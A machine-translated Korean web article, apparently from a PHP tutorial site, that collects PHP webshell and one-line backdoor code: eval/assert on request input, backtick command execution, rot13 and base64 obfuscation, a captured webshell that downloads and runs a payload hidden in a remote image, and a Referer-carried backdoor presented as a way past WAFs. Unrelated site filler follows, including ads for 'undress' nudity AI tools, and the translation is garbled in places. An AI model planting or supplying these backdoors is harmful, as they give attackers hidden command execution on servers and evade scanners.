가장 일반적인 한 문장 백도어 중 하나는 다음과 같이 작성될 수 있습니다
<?php @eval($_POST['cmd']);?>
또는 이것
<?php @assert($_POST['cmd']);?>
학생 tudouya가
을 사용하여 FREEBUF에 [구성 기술]을 제공했습니다.시공세대는 물론 너무 직관적이라면 이렇게 쓰면 됩니다
그런 다음 이를 위장하기 위한 일반 코드를 입력하면 간단한 "anti-kill" 셸 샘플이 나타납니다.
역사상 가장 쉬운 PHP 백도어로 알려진 것이 무엇인지 살펴보겠습니다
코드로 바로 이동:
<?php $c=urldecode($_GET['c']);if($c){`$c`;}//完整 !$_GET['c']||`{$_GET['c']}`;//精简 /******************************************************* * 原理:PHP中``符号包含会当作系统命令执行 * 示例:http://host/?c=type%20config.php>config.txt * 然后就可以下载config.txt查看内容了! * 可以试试更变态的命令,不要干坏事哦! *******************************************************/
구현 원칙은 PHP가 ` 기호(참고: 작은 따옴표 아님)에 포함된 내용을 실행을 위한 시스템 명령으로 직접 구문 분석한다는 것입니다! 이렇게 하면 자유롭고 비정상적으로 확장할 수 있습니다!
똑같은 간단한 코드를 살펴보겠습니다
<?php preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft"); ?>
비밀번호 페이지
최근 PHP 기반의 웹쉘 샘플을 캡처했습니다. 독창적인 동적 코드 생성 방법과 번거로운 셀프 페이지 변장 방법이 이 샘플을 분석하는 과정에서 많은 즐거움을 느끼게 했습니다. 다음으로, 이 멋진 Webshell을 함께 즐겨봅시다.
Webshell 코드는 다음과 같습니다.
<?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents( sprintf('%s?%s',pack("H*", '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649); @preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null); ?>
핵심은 다음 코드를 살펴보는 것입니다.
sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())
여기서 실행해보니 실제로는 사진입니다. 복호화된 사진 주소는 다음과 같습니다.
http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
그런 다음 file_get_contents 함수를 호출하여 이미지를 문자열로 읽은 다음 substr은 3649바이트 이후의 내용을 가져온 다음 gzuncompress를 호출하여 압축을 풀어 실제 코드를 얻습니다. 마지막으로 preg_replace의 수정자 e가 호출되어 악성 코드를 실행합니다. 악성 샘플 코드를 복원하려면 여기에 다음 명령문을 실행하세요.
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));
?>
한 문장으로 기능 없이 PHP 숨기기:
<?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); ?>
$_POST['code']의 내용을 $_SESSION['theCode']에 할당한 다음 $_SESSION['theCode']를 실행하는 것이 특징입니다. 스캐닝 도구를 사용하여 코드를 확인하면 경보가 울리지 않습니다. 이는 목적입니다.
매우 숨겨진 PHP 백도어:
<?php $_GET [a]( $_GET [b]);?>
GET 기능을 사용하는 것만으로도 트로이 목마가 됩니다.
사용 방법:
?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
실행 후 현재 디렉토리는 한 문장으로 c.php Trojan을 생성합니다. 매개변수 a가 eval인 경우 Trojan 생성에 실패했다는 오류가 보고되며, Assert인 경우에도 동일한 오류가 보고됩니다. 그러나 트로이 목마는 실제로 과소평가되어서는 안 됩니다. 이는 이러한 응용 프로그램으로 확장되는 것입니다.
PHP 백도어를 실행하도록 코딩된 계층적 요청:
이 방법은 두 개의 파일인 파일 1
에서 구현됩니다.
<?php //1.php header( 'Content-type:text/html;charset=utf-8' ); parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); if (reset( $a ) == '10' && count ( $a ) == 9) { eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6))))); } ?>
파일 2
<?php //2.php header( 'Content-type:text/html;charset=utf-8' ); //要执行的代码 $code = <<<CODE phpinfo(); CODE; //进行base64编码 $code = base64_encode ( $code ); //构造referer字符串 $referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ; //后门url $url = 'http://localhost/test1/1.php ' ; $ch = curl_init(); $options = array ( CURLOPT_URL => $url , CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_REFERER => $referer ); curl_setopt_array( $ch , $options ); echocurl_exec( $ch ); ?>
HTTP 요청에서 HTTP_REFERER를 사용하여 base64로 인코딩된 코드를 실행하면 백도어 효과를 얻을 수 있습니다. 일반적으로 WAF는 리퍼러를 더 느슨하게 감지하거나 감지하지 않습니다. 이 아이디어를 사용하여 waf를 우회하는 것이 좋습니다.
우리는 학습 태도로 이러한 PHP 백도어 프로그램을 다룹니다. 많은 PHP 백도어 코드를 통해 프로그래머의 의도가 얼마나 좋은지 알 수 있습니다.

PHP에서, 특성은 방법 재사용이 필요하지만 상속에 적합하지 않은 상황에 적합합니다. 1) 특성은 클래스에서 다중 상속의 복잡성을 피할 수 있도록 수많은 방법을 허용합니다. 2) 특성을 사용할 때는 대안과 키워드를 통해 해결할 수있는 방법 충돌에주의를 기울여야합니다. 3) 성능을 최적화하고 코드 유지 보수성을 향상시키기 위해 특성을 과도하게 사용해야하며 단일 책임을 유지해야합니다.

의존성 주입 컨테이너 (DIC)는 PHP 프로젝트에 사용하기위한 객체 종속성을 관리하고 제공하는 도구입니다. DIC의 주요 이점에는 다음이 포함됩니다. 1. 디커플링, 구성 요소 독립적 인 코드는 유지 관리 및 테스트가 쉽습니다. 2. 유연성, 의존성을 교체 또는 수정하기 쉽습니다. 3. 테스트 가능성, 단위 테스트를 위해 모의 객체를 주입하기에 편리합니다.

SplfixedArray는 PHP의 고정 크기 배열로, 고성능 및 메모리 사용이 필요한 시나리오에 적합합니다. 1) 동적 조정으로 인한 오버 헤드를 피하기 위해 생성 할 때 크기를 지정해야합니다. 2) C 언어 배열을 기반으로 메모리 및 빠른 액세스 속도를 직접 작동합니다. 3) 대규모 데이터 처리 및 메모리에 민감한 환경에 적합하지만 크기가 고정되어 있으므로주의해서 사용해야합니다.

PHP는 $ \ _ 파일 변수를 통해 파일 업로드를 처리합니다. 보안을 보장하는 방법에는 다음이 포함됩니다. 1. 오류 확인 확인, 2. 파일 유형 및 크기 확인, 3 파일 덮어 쓰기 방지, 4. 파일을 영구 저장소 위치로 이동하십시오.

JavaScript에서는 NullCoalescingOperator (??) 및 NullCoalescingAssignmentOperator (?? =)를 사용할 수 있습니다. 1. 2. ??= 변수를 오른쪽 피연산자의 값에 할당하지만 변수가 무효 또는 정의되지 않은 경우에만. 이 연산자는 코드 로직을 단순화하고 가독성과 성능을 향상시킵니다.

CSP는 XSS 공격을 방지하고 리소스로드를 제한하여 웹 사이트 보안을 향상시킬 수 있기 때문에 중요합니다. 1.CSP는 HTTP 응답 헤더의 일부이며 엄격한 정책을 통해 악의적 인 행동을 제한합니다. 2. 기본 사용법은 동일한 원점에서 자원을로드 할 수있는 것입니다. 3. 고급 사용량은 특정 도메인 이름을 스크립트와 스타일로드 할 수 있도록하는 것과 같은보다 세밀한 전략을 설정할 수 있습니다. 4. Content-Security Policy 보고서 전용 헤더를 사용하여 CSP 정책을 디버그하고 최적화하십시오.

HTTP 요청 방법에는 각각 리소스를 확보, 제출, 업데이트 및 삭제하는 데 사용되는 Get, Post, Put and Delete가 포함됩니다. 1. GET 방법은 리소스를 얻는 데 사용되며 읽기 작업에 적합합니다. 2. 게시물은 데이터를 제출하는 데 사용되며 종종 새로운 리소스를 만드는 데 사용됩니다. 3. PUT 방법은 리소스를 업데이트하는 데 사용되며 완전한 업데이트에 적합합니다. 4. 삭제 방법은 자원을 삭제하는 데 사용되며 삭제 작업에 적합합니다.

HTTPS는 HTTP를 기반으로 보안 계층을 추가하는 프로토콜로, 주로 암호화 된 데이터를 통해 사용자 개인 정보 및 데이터 보안을 보호합니다. 작업 원칙에는 TLS 핸드 셰이크, 인증서 확인 및 암호화 된 커뮤니케이션이 포함됩니다. HTTP를 구현할 때는 인증서 관리, 성능 영향 및 혼합 콘텐츠 문제에주의를 기울여야합니다.


핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

AI Hentai Generator
AI Hentai를 무료로 생성하십시오.

인기 기사

뜨거운 도구

WebStorm Mac 버전
유용한 JavaScript 개발 도구

스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경

SublimeText3 영어 버전
권장 사항: Win 버전, 코드 프롬프트 지원!

SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)

DVWA
DVWA(Damn Vulnerable Web App)는 매우 취약한 PHP/MySQL 웹 애플리케이션입니다. 주요 목표는 보안 전문가가 법적 환경에서 자신의 기술과 도구를 테스트하고, 웹 개발자가 웹 응용 프로그램 보안 프로세스를 더 잘 이해할 수 있도록 돕고, 교사/학생이 교실 환경 웹 응용 프로그램에서 가르치고 배울 수 있도록 돕는 것입니다. 보안. DVWA의 목표는 다양한 난이도의 간단하고 간단한 인터페이스를 통해 가장 일반적인 웹 취약점 중 일부를 연습하는 것입니다. 이 소프트웨어는

뜨거운 주제



